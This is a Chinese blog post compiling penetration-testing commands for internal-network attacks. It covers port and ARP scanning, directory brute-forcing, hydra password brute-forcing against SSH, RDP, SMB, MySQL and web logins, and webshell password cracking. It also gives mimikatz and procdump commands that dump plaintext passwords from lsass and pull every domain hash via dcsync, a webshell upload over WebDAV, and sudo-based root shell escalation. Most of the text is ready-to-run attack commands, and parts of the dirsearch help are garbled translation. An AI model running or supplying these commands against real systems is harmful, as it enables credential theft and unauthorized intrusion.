内网渗透常用命令

本文最后更新于:2023年12月29日 上午

内网渗透常用命令汇总

nmap

常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
-Pn : 跳过主机存活检测,探测端口开放情况(默认主机存活,对所有指定网段或主机进行扫描)
-sS :基于tcp三次握手的syn扫描(隐匿)
-sV : 探测打开的端口以确定服务和版本信息
-sSV : -sS -sV
-V : 打印版本号
-A : 综合扫描(所有的事情都会做一遍)
-p : 指定端口探测
-p-:所有端口
-p80,445:指定端口
-p1000-2000:指定端口的范围
-T : 扫描速度的设置,一般用T4,越高越快
-F : 快速扫描,对常用的端口进行扫描
-oN : 标准输出
-sP :ping扫描(不进行端口扫描)如果对方开启了防火墙,则-sP没用

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nmap 192.168.60.0/24    			//扫描D段
nmap -sP 192.168.60.0/24 //ping扫描D段
nmap -sT -Pn 192.168.22.0/24 -p80 //跳过ping扫描D段

nmap -A 192.168.1.103 -p 0-65535 //全部信息扫描
nmap -sS 192.168.1.103 -p 1-1000 //SYN半连接扫描,相对来说稳定而且快,指定端口1-1000
nmap -Pn -sT 192.168.22.129 --script=all //跳过ping扫描

nmap -sC -sV -p 80,3306 192.168.1.103 -o 192.168.1.103.txt //特定端口详细信息扫描

nmap --interactive //nmap提权,要有nmap文件夹


nmap 192.168.22.129 -sC //漏洞探测,会对所有的脚本进行探测(-sC相当于--script=defaults)
nmap 192.168.22.129 --script=smb2-time.nse //指定脚本探测

masscan

nmap的下位替代,扫描全端口很快

1
masscan 192.168.111.9 -p1-65535 

Netdiscover

基于ARP的网络扫描工具,这款工具的主要用途是通过协议,判断IP地址是否被使用,从而发现网络中存活的主机

常用参数

-i device 网络接口
-r range 扫描范围,例如192.168.0.0/24,仅支持/8, /16和/24
-l file 扫描范围列表文件,每行一个范围
-p 被动模式:不发生任何报文,仅嗅探
-m file 扫描已知Mac地址和主机名的列表文件
-F filter 自定义pcap filter表达式(默认“arp”)
-s time 每个ARP请求间的休眠时间(毫秒,默认1ms)
-c count 发送每个ARP请求的次数,用于丢失数据包的网络,默认1次
-n node 扫描最后的源IP,默认为67(x.x.x.67),允许范围为2-253
-d 忽略自动扫描和快速模式的主配置文件,扫描默认的范围和IP
-f 启用快速模式扫描,扫描每个网段的.1、.100 和 .254
-P 产生输出到文件或者其他解析程序,扫描完成后退出,例如:`netdiscover -P -r 192.168.20.0/16
-L 与-P类似,但在主动扫描后继续捕获ARP包
-N 不打印表头,仅在-P 或者-L启用时有效
-S 已弃用

常用命令

1
2
3
4
netdiscover -i ens38                        //扫描指定接口
netdiscover -i eth0 -r 192.168.54.0/24 //扫描指定范围
netdiscover -i ens38 -r 192.168.0.0/16 -p //被动扫描,仅嗅探
netdiscover -i ens38 -f //快速扫描

arp-scan

arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标。

arp是什么?

地址解析协议,其基本功能为==透过目标设备的IP地址,查询目标设备的MAC地址==,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。

指令介绍

1
2
3
4
5
6
7
8
9
10
参数名	参数含义	使用示例
-f 从指定文件中读取主机名或地址 arp-scan -f ip.txt
-l 从网络接口配置生成地址 arp-scan -l
-i 各扫描之间的时间差 arp-scan -l -i 1000
-r 每个主机扫描次数 arp-scan -l -r 5
-V 显示程序版本并退出 arp-scan -l -V
-t 设置主机超时时间 arp-scan -t 1000 192.168.75.0/24
-L 使用网络接口 arp-scan -L eth0
-g 不显示重复的数据 arp-scan -l -g
-D 显示数据包往返时间 arp-scan -l -D

轻量级扫描工具,用来扫描局域网的主机还是挺好用的,由于扫描的少,所以扫描速度比较快,可以很快的查看到局域网有哪些主机和对应的MAC地址,配合nmap一起使用有奇效

dirb

dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站

常用参数

格式:dirb [<wordlist_file(s)>] [options]

-a 设置user-agent

-p proxy:port设置代理

-c 设置cookie

-z 添加毫秒延迟,避免洪水攻击

-o 输出结果

-X 在每个字典的后面添加一个后缀

-H 添加请求头

-i 不区分大小写搜索

常用命令

1
2
3
dirb http://192.168.1.116/ /usr/share/wordlists/dirb/big.txt 
dirb http://192.168.1.116/ -X .php -z 100 -o test.txt //添加.php后缀,并延迟100ms,保存输出
dirb http://192.168.1.116/ -p 46.17.45.194:5210 //使用代理

dircsearch

这是一个基于 Python 的命令行网站目录扫描器,旨在暴力破解站点结构,包括目录和文件。

dirb相对更快更轻便,但我觉得还是dirsearch更好用一点,实战优先用dirsearch

常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
-u URL, --url=URL URL target。
-L URLLIST, --url-list=URLLIST。
目标URL列表
-e EXTENSIONS, --extensions=EXTENSIONS。
扩展名列表用逗号隔开(例如:php,asp)
-E, --extensions-list
使用预定义的通用扩展列表

词典设置。
-w WORDLIST,--wordlist=WORDLIST。
-l, -小写
-f, --Force-extensions(强制扩展)
强制扩展每个词表条目(比如在
DirBuster)

一般设置。
-s DELAY, --delay=DELAY。
请求之间的延迟(浮点数)
-r,--递归式
-R RECURSIVE_LEVEL_MAX, --递归级别-max=RECURSIVE_LEVEL_MAX。
最大递归级别(子目录)(默认:1 [仅适用于
rootdir + 1 dir])
--压制-空,--压制-空。
--扫描-子目录=SCANSUBDIRS, --扫描-子目录=SCANSUBDIRS。
扫描给定的-u|--url的子目录(以-u|--url分隔)。
逗号)
--exclud-subdir=EXCLUDESUBDIRS, --exclud-subdirs=EXCLUDESUBDIRS。
在递归过程中排除以下子目录。
扫描
-t THREADSCOUNT, --threads=THREADSCOUNT。
线程数
-x EXCLUDESTATUSCODES,--exclud-status=EXCLUDESTATUSCODES。
排除状态代码,用逗号隔开(例如。301,
500)
--exclud-texts=EXCLUDETEXTS。
以文本排除答复,用逗号隔开。
(例如:"找不到""错误")
--exclud-regexps=EXCLUDEREGEXPS。
通过regexps排除响应,用逗号隔开。
(例如:"Not foun[a-z]{1}", "^Error$")
-c COOKIE, --cookie=COOKIE。
--ua=USERAGENT,--user-agent=USERAGENT。
-F, --follow-redirects.
-H HEADERS, --header=HEADERS。
要添加的头信息(例如:--header "Referer:
example.com" --header "User-Agent: IE"
--随机代理,--随机用户代理。

连接设置:
--timeout=TIMEOUT 连接超时。
--ip=IP 将名称解析为IP地址。
--proxy=HTTPPROXY, --http-proxy=HTTPPROXY。
Http代理(例如:localhost:8080)
--http-method=HTTPMETHOD
使用的方法,默认。GET,也可以是: HEAD;POST
--max-retries=MAXRRETIES
-b, --request by hostname(按主机名请求)
默认情况下,dirsearch会以IP为单位进行请求以提高速度。
这就强制按主机名请求

输出报告:
--simple-report=SIMPLEOUTPUTFILE。
只找到路径
-纯文本-报告=PLAINTEXTOUTPUTFILE。
找到状态码的路径
--json-report=JSONOUTPUTFILE。

常用命令

简单使用

1
2
3
4
dirsearch -u https://192.168.1.116/
dirsearch -e php,html,js -u https://192.168.1.116/
dirsearch -e php,html,js -u https://192.168.1.116/ -w /path/to/wordlist
dirsearch -u https://192.168.1.116/ -e *

以简单格式保存输出

1
dirsearch -u http://testphp.vulnweb.com/ --simple-report=report

常见文件后缀

1
2
3
4
5
6
7
8
9
10
beifen.rar
beifen.zip
beifen.7z
beifen.tar
beifen.tar.gz
beifen.bak
beifen.txt
beifen.phps (用于浏览器查看php文件内容)
beifen.swp(vim产生的临时文件,第二次是.swo,注:其文件前有个点,如文件名为index产生的临时文件为.index.swp)
~ (在文本编辑时产生的备份文件)

hydra(重中之重)

常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
语法:Hydra 参数 IP 服务

参数:
-l 小写,指定用户名进行破解
-L 大写,指定用户的用户名字典
-p 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-M 指定目标ip列表文件,批量破解。
-o 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t 同时运行的线程数,默认是16
-w 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意:
1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
4.缺点,如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。

常用命令

1、破解ssh:

1
2
3
4
5
6
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
hydra -l root -P password.txt 192.168.1.111 ssh

hydra -l user.txt -P pass.txt 10.38.3.1 ssh

2、破解ftp:

1
2
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、爆破http:

( http-get or http-form-post.)

1
2
3
hydra -l admin -P password.txt 192.168.1.111 http-get /login.php

hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^USER^&pass=^PASS^:<title>invalide</title"

【注】(user,pass改为账户密码提交表单

4、get方式提交,破解web登录:

1
2
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

5、post方式提交,破解web登录:

1
2
3
4
5
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解

6、破解https:

1
2
hydra -m /index.php -l muts -P pass.txt IP https
hydra -m /index.php -l username -P pass.txt IP https

7、破解teamspeak:

1
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

8、破解cisco:

1
2
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable

9、破解smb:

1
hydra -l administrator -P pass.txt 10.36.16.18 smb

10、破解pop3:

1
hydra -l muts -P pass.txt my.pop3.mail pop3

11、破解rdp:(3389,重要)

1
2
3
hydra ip rdp -l administrator -P pass.txt -V
hydra -l Administrator -P password.txt rdp://192.168.1.111 -F
hydra -l administrator -P password.txt rdp://192.168.1.111 -F

12、破解http-proxy:

1
hydra -l admin -P pass.txt http-proxy://IP

13、破解imap:

1
2
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

14、破解telnet:

1
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

15、爆破mysql

1
2
3
hydra -l root -P /root/pentest/passwd.txt mysql://192.168.0.100 -f -o /root/pentest/mysql.txt -V

hydra -l root -P password.txt 192.168.111.8 mysql

16、爆破sql server

(前提是目标的mysql可远程访问)

1
hydra -l sa -P password.txt 192.168.1.111 mssql

17、爆破webdav

1
hydra -L 1.txt -P 1.txt 192.168.245.135 http-get /webdav

cheetah

Cheetah是一款基于字典的webshell密码爆破工具,Cheetah的工作原理是能根据自动探测出的web服务设置相关参数一次性提交大量的探测密码进行爆破,爆破效率是其他普通webshell密码暴力破解工具上千倍。

常用参数

参数说明:

  • -h, –help 显示帮助信息并退出
  • -i, –info 显示程序信息并退出
  • -v, –verbose 启用详细输出模式(默认禁用)
  • -c, –clear 去重字典文件(默认禁用)
  • -up, –update 更新cheetah
  • -r , –request 指定请求方式(默认POST方式)
  • -t , –time 指定请求间隔时间(默认0秒)
  • -w , –webshell 指定webshell类型(默认自动探测)
  • -s , –server 指定web服务器名称(默认自动探测)
  • -n , –number 指定一次请求参数数量(默认自动设置)
  • -u , –url 指定webshell url地址
  • -b , –url-file 指定批量webshell urls文件
  • -p file [file …] 指定多个字典文件(默认使用data/pwd.list)

常用命令

1
2
3
4
5
python cheetah.py -u http://orz/orz.php
python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v
python cheetah.py -u http://orz/orz.asp -r get -c -p pwd.list
python cheetah.py -u http://orz/orz -w aspx -s apache -n 1000
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v

爆破一句话密码

1、爆破php一句话

1
python3 cheetah.py -u http://www.yijuhua.com/a.php -n 1000 -v -p data/pwd.list

2、爆破asp一句话

1
python3 cheetah.py -u http://www.yijuhua.com/a.asp -n 1000 -v -p data/pwd.list

3、爆破aspx一句话

1
python3 cheetah.py -u http://www.yijuhua.com/a.asp -n 1000 -v -p data/pwd.list

在成功获取到一句话密码后,即可通过蚁剑或菜刀连接即可。

john

https://cloud.tencent.com/developer/article/1937044

John the Ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文

  • 可执行文件位置: /usr/sbin/john
  • 密码字典所在目录:/usr/share/john/

使用

在桌面创建一个1.txt,并且将hsah值放入

然后

1
john 

searchsploit

kali的poc新地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits/

是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。

Exploit-DB是一个漏洞库,kali中保存了一个该漏洞库的拷贝,利用上面提到的命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用

1
searchsploit joomla 3.7.0

查看路径:/usr/share/exploitdb/exploits/+查到的

比如这里,cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

image-20230805161215924

cewl

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。

常用参数

-k, –keep:保存下载文件。

-d , –depth :爬行深度,默认2。

-m, –min_world_length:最小长度,默认最小长度为3。

-o, –offsite:允许爬虫访问其他站点。

-w, –write:将输出结果写入到文件。

-u, –ua :设置user agent。

-n, –no-words:不输出字典。

–with-numbers:允许单词中存在数字,跟字母一样。

-a, –meta:包括元数据。

–meta_file file:输出元数据文件。

-e, –email:包括email地址。

–email_file :输入邮件地址文件。

–meta-temp-dir

:exiftool解析文件时使用的临时目录,默认是/temp。

-c, –count:显示发现的每个单词的数量。

-v, –verbose:verbose。

–debug:提取调试信息。

常用命令

生成指定长度的密码字典,你可以使用-m选项来设置:

1
cewl http://www.ignitetechnologies.in/ -m 9 -w passwd.txt

从网站中获取Email,你可以使用-e选项来启用Email参数,并配合-n选项来隐藏工具在爬取网站过程中生成的密码字典:

1
cewl http://www.ignitetechnologies.in/ -n -e -w passwd.txt

增加爬取深度,如果你想增加爬虫的爬取深度以生成更大的字典文件,你可以使用-d选项来指定爬取深度,默认的爬取深度为2:

1
cewl http://www.ignitetechnologies.in/ -d 3 -w passwd.txt

生成包含数字和字符的字典

1
cewl http://testphp.vulnweb.com/ --with-numbers -w passwd.txt

如果目标网站需要进行页面登录认证的话,我们就要使用下列参数来绕过页面认证的限制:

1
2
3
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin--auth_pass password -v -w passwd.txt

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin--auth_pass password -v -w passwd.txt

计算网站中单词出现的次数

1
cewl http://www.baidu.com/ -c

使用–proxy option选项来启用代理URL功能:

1
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

wfuzz

Wfuzz是一款为了评估WEB应用而生的Fuzz(Fuzz是爆破的一种手段)工具,它基于一个简单的理念,即用给定的Payload去fuzz。

常用参数

主库的接口:fuzz, payload, session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
--hc 	过滤状态码
--sc 需要显示的状态码
-c 带颜色显示
-w 指定使用字典
-z 设置payload 【比如:字典】
-z file,1.txt(以文件形式,导入1.txt)
-z range,1-10(以范围形式,1到10)
-z list,1-2-3-10(列表形式,1,2,3,10)
-t 设置线程 默认10
-s 请求间隔时间
-d 设定POST量
-d “uname=admin&passwd=admin”
-b 设定cookie量
-b “cookie=”
-H 参数来指定HTTP请求的请求头,多次指定多次使用。
-H “User-Agent: firfox”
-f 输出到文件的格式,格式有raw,json,csv,magictree,html
-f /tmp/1,html (将结果输出到tmp目录下的1,以html格式)
-X 设定请求方法
-X GET
-R 递归深度,探测目录很好
递归深度为1也就是说当发现某一个目录存在的时候,在存在目录下再递归一次字典。
-R 1(深度为1)

显示或隐藏信息
使用 –hc –hl –hw –hh 可以隐藏相应结果

1
2
3
4
5
6
7
--hc 503	隐藏响应码为503的
--hl 20 隐藏响应信息行数为20行的
--hw 30 隐藏响应信息中字数为30的
--hh 50 隐藏响应信息中字符数为50的

使用 --sc --sl --sw --sh 可以特别显示相应结果
--sc 405:显示响应码405

常用命令

爆破目录

1
wfuzz -w wordlist URL/FUZZ

多个字典

使用-z 或-w 参数可以同时指定多个字典,这时相应的占位符应设置为 FUZZ,FUZ2Z,FUZ3Z,….,FUZnZ, 其中n代表了占位序号。想要同时爆破目录、文件名、后缀,可以这样:

1
wfuzz -w 目录字典路径 -w 文件名字典路径 -w 后缀名字典路径 URL/FUZZ/FUZ2Z.FUZ3Z

测试POST请求

如果想使用wfuzz测试form-encoded的数据,POST请求正文为:username=&password=,只需要传入-d参数即可:

1
2
3
wfuzz -z file,/usr/share/wfuzz/wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php`

wfuzz -w userList -w pwdList -d "username=FUZZ&password=FUZ2Z" http://127.0.0.1/login.php

遍历枚举测试URL中参数值
假如你发现了一个未授权漏洞,地址为:http://127.0.0.1/getuser.php?uid=123 可获取uid为123的个人信息

uid参数可以遍历,已知123为三位数纯数字,需要从000-999进行遍历,也可以使用wfuzz来完成:

1
wfuzz -z range,000-999 --hl 20 http://127.0.0.1/getuser.php?uid=FUZZ

mimikatz

可以提升进程权限注入进程读取进程内存,当然他最大的亮点是他可以直接从 lsass中获取当前处于Active系统的登录密码

常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
cls:       清屏
standard: 标准模块,基本命令
crypto: 加密相关模块
sekurlsa: 与证书相关的模块
kerberos: kerberos模块
privilege: 提权相关模块
process: 进程相关模块
serivce: 服务相关模块
lsadump: LsaDump模块
ts: 终端服务器模块
event: 事件模块
misc: 杂项模块
token: 令牌操作模块
vault: Windows 、证书模块
minesweeper:Mine Sweeper模块
net:
dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight: BusyLight Module
sysenv: 系统环境值模块
sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: 用于SR98设备和T5577目标的RF模块
rdm: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 退出

常用命令

可以在cs上了beacon之后的命令行里面直接运行

[+]普通管理员权限可以执行的命令(密码查询与权限检测与日志记录)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
抓取目标机器的账号和明文密码:
logonPasswords
sekurlsa::logonPasswords

获取本地用户信息及密码
wdigest
sekurlsa::wdigest

获取tspkg用户信息及密码
tspkg
sekurlsa::tspkg

提升权限
debug
privilege::debug

列出系统的核心模块及所在位置
modules
process::modules

查看ntds.dit与sam文件的信息
lsadump::lsa /inject

[+]域控权限才能执行的命令:

1
2
3
4
5
输出指定用户的密码信息
lsadump::dcsync /domain:test.com /user:krbtgt

列出域内所有用户的账号密码
lsadump::dcsync /domain:test.com /all /csv

procdump

1
2
3
4
5
6
#拉出lsass的内存并保存成文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp

#破解内存中的密码
sekurlsa::minidump lass.dmp
sekurlsa::logonpasswords

有时候域管理员会禁用cmd等命令,这时候我们可以使用mimikatz进行恢复

1
2
3
4
privilege::debug
misc::cmd
misc::regedit
misc::taskmgr

crunch

常用参数

min 设定最小字符串长度(必选)
max 设定最大字符串长度(必选)

options
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/etc/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-I 通常与-t联合使用,表明该字符为实义字符
-m 通常与-p搭配
-o 将密码保存到指定文件
-p 指定元素以组合的方式进行
-q 读取密码文件,即读取pass.txt
-r 定义重某一字符串重新开始
-s 指定一个开始的字符,即从自己定义的密码xxxx开始
-t 指定密码输出的格式
-u 禁止打印百分比(必须为最后一个选项)
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z

特殊字符

% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字符

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
生成长度为1-4的数字密码,将结果输出到password1.txt中 
crunch 1 4 1234567890 -o password1.txt
crunch 1 4 % -o password1.txt

生成一个字典库 (5位的6个小写字母的随机排列组合,可以生成67 MB这么大的字典文件)
crunch 5 5 -b 20mib -o START

通过-l参数来使@,%^等特殊字符输出(-l 表明只有@是实体字符的一部分)
crunch 7 7 -t p@ss,%^ -l a@aaaaa

生成pass01-pass99所有数字组合
crunch 6 6 -t pass%% >>newpwd.txt

生成六位小写字母密码,其中前四位为pass
crunch 6 6 -t pass@@ >>newpwd.txt

制作8位数字字典
crunch 8 8 charset.lst numeric -o num8.dic

生成几个元素的组合(可以用于社工中收集的信息)
crunch 4 4 -p zhangsan 2018 0101

多种组合 生成3个元素的组合,前三位为定义的字符串(前三位是aaa或者bbb,后两位是小写字母和数字)
crunch 3 3 -t d@% -p aaa bbb

-o参数也可使用>>来简化
crunch 4 4 -d 2@ -t @@@% >> test.txt

生成5位密码,格式为小写字母+数字+符号+大写字母+数字,并以 @4#e4开始,分割为10k大小
crunch 5 5 -t @%^,% -s @4#e4 -b 10kib -o 1.txt

密码库:/usr/share/crunch/charset.lst
调用密码库 charset.lst中的 hex-upper项目字符,生成4位密码,其中格式为@ + hex-upper +% +%
crunch 4 4 -f charset.lst hex-upper -t @@%% -l @xdd

WeblogicScaner

漏洞扫描

常用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
usage: ws.py [-h] -t TARGETS [TARGETS ...] -v VULNERABILITY
[VULNERABILITY ...] [-o OUTPUT]

optional arguments:
-h, --help 帮助信息
-t TARGETS [TARGETS ...], --targets TARGETS [TARGETS ...]
直接填入目标或文件列表(默认使用端口7001). 例子:
127.0.0.1:7001
-v VULNERABILITY [VULNERABILITY ...], --vulnerability VULNERABILITY [VULNERABILITY ...]
漏洞名称或CVE编号,例子:"weblogic administrator console"
-o OUTPUT, --output OUTPUT
输出 json 结果的路径。默认不输出结果
-s, --ssl 强制使用 https 协议请求

常用命令

1
python ws.py -t 192.168.124.129:7001

cadaver

连接webdav的工具

常用命令

用hydra爆破成功webdav之后,可以用cadaver上传shell

1
2
3
cadaver http://192.168.245.135/webdav    //连接

put webshell.php //上传shell

wpscan

wpscan是一款专业针对WordPress安全扫描仪,学着用下

wpscan --url url进行信息扫描

wpscan --url url -e u用户名枚举

爆破密码

1
wpscan --url http://dc-2 -U u.txt -P aa.txt

wfuzz

https://blog.csdn.net/JBlock/article/details/88619117

nikto

Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

nikto常用命令

1
2
3
4
5
6
7
8
9
-upodate   升级,更新插件
-host 扫描目标URl
-id username:password http认证接口
-list-plugins 列出所有可用的插件
-evasion IDS/IPS逃避技术(实例演示里有详细信息)
-port 指定端口(默认80
-ssl 使用SSL
-useproxy 使用http代理
-vhost 域名 当一个IP拥有多个网站时 使用

nikto交互参数(扫描过程中使用)

1
2
3
4
5
6
7
8
9
10
11
空格        报告当前扫描状态
v 显示详细信息
d 显示调试信息
e 显示http错误信息
p 显示扫描进度
r 显示重定向信息
c 显示cookie
a 显示身份认证过程
q 退出程序
N 扫描下一个目标
P 暂停扫描

提权

sudo php -r ‘system(“ /bin/bash”); ‘

sudo su

sudo -i

交互窗口

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

CMS

CMSeek

1
python3 cmseek.py --url http://wordy

joomscan

1
perl joomscan.pl --url http://192.168.0.108

wpscan

1
2
wpscan --url url -e u     //用户名枚举
wpscan --url http://dc-2 -U user.txt -P dc-2.txt //爆破密码

内网渗透常用命令
https://leekosss.github.io/2023/12/01/渗透工具汇总/
作者
leekos
发布于
2023年12月1日
更新于
2023年12月29日
许可协议